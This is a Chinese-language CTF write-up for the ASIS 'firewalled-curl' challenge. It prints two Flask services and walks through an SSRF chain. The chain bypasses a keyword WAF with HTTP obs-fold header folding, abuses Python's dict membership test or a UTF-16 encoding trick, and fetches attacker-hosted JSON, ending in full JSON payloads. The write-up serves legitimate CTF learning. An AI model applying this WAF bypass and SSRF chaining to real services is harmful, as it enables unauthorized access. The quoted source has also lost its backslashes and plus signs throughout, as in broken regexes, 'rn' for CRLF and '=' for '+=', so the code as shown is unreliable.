题目描述
给了源码,我们得到一个docker-compose.yml
包含两个服务的文件:flag-container 和 firewalled-curl。第二个通过 8000
端口暴露在公网上。它们都是基于apache 的flask应用。
docker-compose.yml:
代码语言:javascript复制version: "3.9"
services:
flag-container:
build: ./flag-container
environment:
- FLAG=ASIS{test-flag}
restart: always
firewalled-curl:
build: ./firewalled-curl
ports:
- "8000:80"
restart: always
源码:
flag-container:
代码语言:javascript复制#!/usr/bin/env python3
from flask import Flask,request
import requests
import json
import os
app = Flask(__name__)
application = app
flag = os.environ.get('FLAG')
@app.route('/flag')
def index():
args = request.args.get('args')
try:
r = requests.post('http://firewalled-curl/req',json=json.loads(args)).json()
if 'request' in r and 'flag' in r['request'] and 'flag' in request.headers['X-Request']:
return flag
except:
pass
return 'No flag for you :('
if(__name__ == '__main__'):
app.run(port=8000)
firewalled-curl:
代码语言:javascript复制#!/usr/bin/env python3
from flask import Flask,Response,request
import time
import socket
import re
import base64
import json
isSafeAscii = lambda s : not re.search(r'[^x20-x7F]',s)# 匿名函数
isSafeHeader = lambda s : isSafeAscii(s)
isSafePath = lambda s : s[0] == '/' and isSafeAscii(s) and ' ' not in s
badHeaderNames = ['encoding','type','charset']
unsafeKeywords = ["flag"]
app = Flask(__name__)
application = app
def isJson(s):
try:
json.loads(s)
return True
except:
return False
def checkHostname(name):
name = str(name)
port = '80'
if(':' in name):
sp = name.split(':')
name = sp[0]
port = sp[1]
if(
(
re.search(r'^[a-z0-9][a-z0-9-.] $',name) or
re.search(r'^[0-9] .[0-9] .[0-9] .[0-9] $',name)
) and
0 < int(port) < 0x10000
):
return name,int(port)
return Exception('unsafe port'),Exception('unsafe hostname')
def recvuntil(sock,u):
r = b''
while(r[-len(u):] != u):
r = sock.recv(1)
return r
def checkHeaders(headers):# headers类型为 dict
newHeaders = {}
if(type(headers) is not dict):
return Exception('unsafe headers')
for headerName in headers:
headerValue = str(headers[headerName])# 获得 value
if((isSafeHeader(headerName) and ':' not in headerName) and isSafeHeader(headerValue)):
isBad = False
for badHeaderName in badHeaderNames: # ['encoding','type','charset']
if(badHeaderName in headerName.lower()):
isBad = True
break
# 这个 waf !!!!
for badHeaderValue in unsafeKeywords: # ['flag']
if(badHeaderValue in headerValue.lower()):
isBad = True
break
if(isBad):
return Exception('bad headers')
newHeaders[headerName] = headerValue
return newHeaders
def checkMethod(method):
if(method in ['GET','POST']):
return method
return Exception('unsafe method')
def checkPath(path):
if(isSafePath(path)):
return path
return Exception('unsafe path')
def checkJson(j):
if(type(j) == str):
# 这个 waf !!!! json中不能有 flag
for u in unsafeKeywords:
if(u in j.lower()):
return False
elif(type(j) == list):
for entry in j:
if(not checkJson(entry)):
return False
elif(type(j) == dict):
for entry in j:
if(not checkJson(j[entry])):
return False
else:
return True
return True
@app.route('/req',methods=['POST'])
def req():
params = request.json
hostname,port = checkHostname(params['host'])
headers = checkHeaders(params['headers'])
method = checkMethod(params['method'])
path = checkPath(params['path'])
returnJson = bool(params['returnJson'])
body = None
for p in [hostname,headers,body,method,path]:
if(isinstance(p,Exception)):
return {'success':False,'error':str(p)}
if(method == 'POST'):
body = str(params['body'])
httpRequest = f'{method} {path} HTTP/1.1rn' # /flag?args={}
if(port == 80):
httpRequest = f'Host: {hostname}rn'
else:
httpRequest = f'Host: {hostname}:{port}rn'
httpRequest = f'Connection: closern'
if(body):
httpRequest = f'Content-Length: {str(len(body))}rn'
for headerName in headers:
httpRequest = f'{headerName}: {headers[headerName]}rn'
httpRequest = 'rn'
if(body):
httpRequest = body # 获取请求体body,是否可以构造?
httpRequest = httpRequest.encode()
with socket.socket(socket.AF_INET,socket.SOCK_STREAM) as sock:
sock.settimeout(1)
sock.connect((hostname,port))
sock.sendall(httpRequest)
statusCode = int(recvuntil(sock,b'n').split(b' ')[1])
headers = {}
line = recvuntil(sock,b'n').strip()
while(line):
headerName = line[:line.index(b':')].strip().decode()
headerValue = line[line.index(b':') 1:].strip().decode()
if(isSafeHeader(headerName) and isSafeHeader(headerValue)):
headers[headerName] = headerValue
line = recvuntil(sock,b'n').strip()
bodyLength = min(int(headers['Content-Length']),0x1000)
body = b''
while(len(body) != bodyLength):
body = sock.recv(1)
sock.close()
if(isJson(body.decode())):
if(not checkJson(json.loads(body.decode()))):
return {'success':False,'error':'unsafe json'}
headers['Content-Type'] = 'application/json'
else:
headers['Content-Type'] = 'application/octet-stream'
if(returnJson):
body = base64.b64encode(body).decode()
return {'statusCode':statusCode,'headers':headers,'body':body,'req':httpRequest.decode()}
resp = Response(body)
resp.status = statusCode
for headerName in headers:
for badHeaderName in badHeaderNames: # ['encoding','type','charset']
if(badHeaderName not in headerName.lower()):
resp.headers[headerName] = headers[headerName]
return resp
@app.route('/')
def index():
resp = Response('hi')
resp.headers['Content-Type'] = 'text/plain'
return resp
if(__name__ == '__main__'):
app.run(port=8000)
审计代码没啥好说的,就硬看完事了。
分析
不考虑waf的情况下那flag是这么个流程
代码语言:javascript复制firewalled-curl服务---->flag-container服务---->firewalled-curl服务---->访问自己服务器得到返回---->拿到flag
firewalled-curl服务接受我们的 json
输入并将其转换为原始的 http 1.1
请求。flag位于flag-container服务中。我们可以通过firewalled-curl访问它,因为只有firewalled-curl暴露在互联网上。
Tm8gZmxhZyBmb3IgeW91IDoo
是 No flag for you :(
的base64编码,返回的这个 body 就是访问对应 host 的结果
对于 flag-container 要拿到flag我们要达成两个条件
代码语言:javascript复制@app.route('/flag')
def index():
args = request.args.get('args')
try:
r = requests.post('http://firewalled-curl/req',json=json.loads(args)).json()
if 'request' in r and 'flag' in r['request'] and 'flag' in request.headers['X-Request']:
return flag
except:
pass
return 'No flag for you :('
通过 firewalled-curl 访问内网的 flag-container ,发送给 flag-container 的报文的请求头中含有 X-Request:flag
,但有waf
isSafeAscii = lambda s : not re.search(r'[^x20-x7F]',s)# 限制只有可见字符才行
isSafeHeader = lambda s : isSafeAscii(s)
isSafePath = lambda s : s[0] == '/' and isSafeAscii(s) and ' ' not in s
badHeaderNames = ['encoding','type','charset']
unsafeKeywords = ["flag"]
...
...
def checkHeaders(headers):# headers类型为 dict
newHeaders = {}
if(type(headers) is not dict):
return Exception('unsafe headers')
for headerName in headers:
headerValue = str(headers[headerName])# 获得 value
if((isSafeHeader(headerName) and ':' not in headerName) and isSafeHeader(headerValue)):# 请求头的key不能有 :
isBad = False
for badHeaderName in badHeaderNames: # ['encoding','type','charset']
if(badHeaderName in headerName.lower()):
isBad = True
break
# 检测请求头key:value中的 值(Value)
for badHeaderValue in unsafeKeywords: # ['flag'],值不能有flag字符串
if(badHeaderValue in headerValue.lower()):
isBad = True
break
if(isBad):
return Exception('bad headers')
newHeaders[headerName] = headerValue
return newHeaders
请求头对应的key: value
中的 value
不能含有 flag
字符串,即 X-Request
对应的值不能有 flag
通过 GET
传参 agrs
,然后将其 POST
给 firewalled-curl服务,得到返回值,得到的这个返回值是个json数据,且json成功解析后要求满足 checkJson
函数的waf检测,同时在 flag-container 中对应得到的返回值r
也要**满足 'request' in r and 'flag' in r['request']
**
但也有waf
代码语言:javascript复制...
def checkJson(j):
if(type(j) == str):
# 这个 waf !!!! json中不能有 flag
for u in unsafeKeywords:
if(u in j.lower()):
return False
elif(type(j) == list):
for entry in j:
if(not checkJson(entry)):
return False
elif(type(j) == dict):
for entry in j:
if(not checkJson(j[entry])):
return False
else:
return True
return True
...
...
while(len(body) != bodyLength):
body = sock.recv(1)
sock.close()
if(isJson(body.decode())):
if(not checkJson(json.loads(body.decode()))):
return {'success':False,'error':'unsafe json'}
headers['Content-Type'] = 'application/json'
else:
headers['Content-Type'] = 'application/octet-stream'
if(returnJson):# returnJson 为 True时
body = base64.b64encode(body).decode()
return {'statusCode':statusCode,'headers':headers,'body':body,'req':httpRequest.decode()}
resp = Response(body)
resp.status = statusCode
for headerName in headers:
for badHeaderName in badHeaderNames: # ['encoding','type','charset']
if(badHeaderName not in headerName.lower()):
resp.headers[headerName] = headers[headerName]
return resp # resp 的结果要为 {"request":"flag"}, 但有waf
checkJson
函数会递归的检查得到的 json 数据的 value 是否含有 flag
字符串
由于程序会将得到的json中的 host
, path
等进行拼接,转成对应的http/1.1
报文然后通过 socket 套接字发送,而发现host
,path
等没有 checkHeaders
函数检测 所以尝试在加入字符 rn
换行注入这种
GET / HTTP/1.1
Host: example.com
Key: value
body
但发现限制了字符集
代码语言:javascript复制def checkHostname(name):
name = str(name)
port = '80'
if(':' in name):
sp = name.split(':')
name = sp[0]
port = sp[1]
if(
(
re.search(r'^[a-z0-9][a-z0-9.-] $',name) or
re.search(r'^[0-9] .[0-9] .[0-9] .[0-9] $',name)
) and
0 < int(port) < 0x10000
):
return name,int(port)
return Exception('unsafe port'),Exception('unsafe hostname')
def checkMethod(method):
if(method in ['GET','POST']):
return method
return Exception('unsafe method')
isSafePath = lambda s : s[0] == '/' and isSafeAscii(s) and ' ' not in s
def checkPath(path):
if(isSafePath(path)):
return path
return Exception('unsafe path')
也不行
解决方案
Flask支持接收折叠头部形式的http报文
第一个点用到了这个
参考 RCF 标准文档 https://datatracker.ietf.org/doc/html/rfc7230#section-3.2.4
代码语言:javascript复制Historically, HTTP header field values could be extended over
multiple lines by preceding each extra line with at least one space
or horizontal tab (obs-fold). This specification deprecates such
line folding except within the message/http media type
(Section 8.3.1). A sender MUST NOT generate a message that includes
line folding (i.e., that has any field-value that contains a match to
the obs-fold rule) unless the message is intended for packaging
within the message/http media type.
从历史上看,HTTP 头字段值可以扩展到通过在每个额外的行前面至少有一个空格或水平制表符来实现多行折叠的消息头。
即如有这样的报文
代码语言:javascript复制GET / HTTP/1.1
Host: example.com
Key: value1
value2
body
服务器最终接受到的请求头 key
是这样的 key: value1 value2
等价于这样的报文
代码语言:javascript复制GET / HTTP/1.1
Host: example.com
Key: value1 value2
body
而从题目源码来看他从json中获得的请求头并没有考虑这点,所以向 /req
发送这样的json
{
"host": "flag-container",
"headers": {
"X-Request":"something",
" flag":"aaa"
},
"method": "GET",
"path": "/flag",
"returnJson": true
}
上面也分析到获取到的这个json解析成 dict 后会用 checkHeaders
函数 递归检验 headers
字典内的 value
值,注意其并**不会检验字典的 key
**,即请求头的key " flag"
不会被waf。
如上,没有出发waf,程序将整理好的 http/1.1 报文通过socket套接字发送给 flag-container
整理下
代码语言:javascript复制GET /flag HTTP/1.1
Host: flag-container
Connection: close
X-Request: something
flag: aaa
发送给 flag-container 后,flag-container 收到的请求头 request.headers
中就存在这样的请求头 {"X-Request": "something flag:aaa"}
这下 'flag' in request.headers['X-Request']
的条件就满足了,上面第一个问题就解决了。
为了更好的理解,本地测试下
代码语言:javascript复制from flask import Flask,request
app = Flask(__name__)
@app.route('/flag')
def index():
print(request.headers)
if(__name__ == '__main__'):
app.run(port=8000)
还是上面的 http 报文,结果
可以发现符合预期,"flag" in request.headers["X-Request"]
满足
python in
关键字的特性
python中的 in
关键字用于检测某个值是否存在于指定的值中,如
"abc" in "aabc123"
,"qwe" in ["aaa", "qwe", "123"]
,均返回 True
对于 dict
类型的变量,in
关键字有有这样的特性
testDict = {"key1": "value1", "key2": "value2"}
print("key1" in testDict)
print("value1" in testDict)
print("value1" in testDict["key1"])
运行结果
in
若用于字典类型数据,则是检测目标字典中是否存在对应的 key
值。
所以对于上面 分析 中的条件2则可以构造得到的 r
为 {"request": {"flag":"aaa"}}
这样满足 'request' in r and 'flag' in r['request']
最后可以在自己服务器上搭建返回 {"request": {"flag":"aaa"}}
即可
exp.json
代码语言:javascript复制{"request": {"flag":"aaa"}}
对 flag-container 的args传参
代码语言:javascript复制args={"host":"own_server","headers":{},"method":"GET","path":"/exp.json","returnJson":false}
注意要 url 编码一下
代码语言:javascript复制args={"host":"own_server","headers":{},"method":"GET","path":"/exp.json","returnJson":false}
最终的payload
post 发送给 /req
{
"host": "flag-container",
"headers": {"X-Request":"something",
" flag":"aaa"},
"method": "GET",
"path": "/flag?args={"host":"own_server","headers":{},"method":"GET","path":"/exp.json","returnJson":false}",
"returnJson": false
}
后记
这题第二个条件本文说的其实是一个非预期的解法,预期解是更改JSON文件的编码。如果使用非utf-8编码,则来自 frewalled-curl 的 isJson
函数在 try{} catch {}
中会失败。
使用这样的命令获取 utf-16.json
文件
echo {"request":"flag"} > secret.json
iconv -f ASCII -t UTF-16 secret.json -o secret_utf16.json
之后需要删除前 2 个 byte-order-mark
字节,以便 body.decode()
不会失败。来自 flag-container 的 Response.json()
仍然会正确猜测编码 (https://github.com/psf/requests/blob/main/requests/utils.py#L950) 但是 firewalled-curl 中会检测 json 失败。
参考
https://sh1yo.art/ctf/firewalled/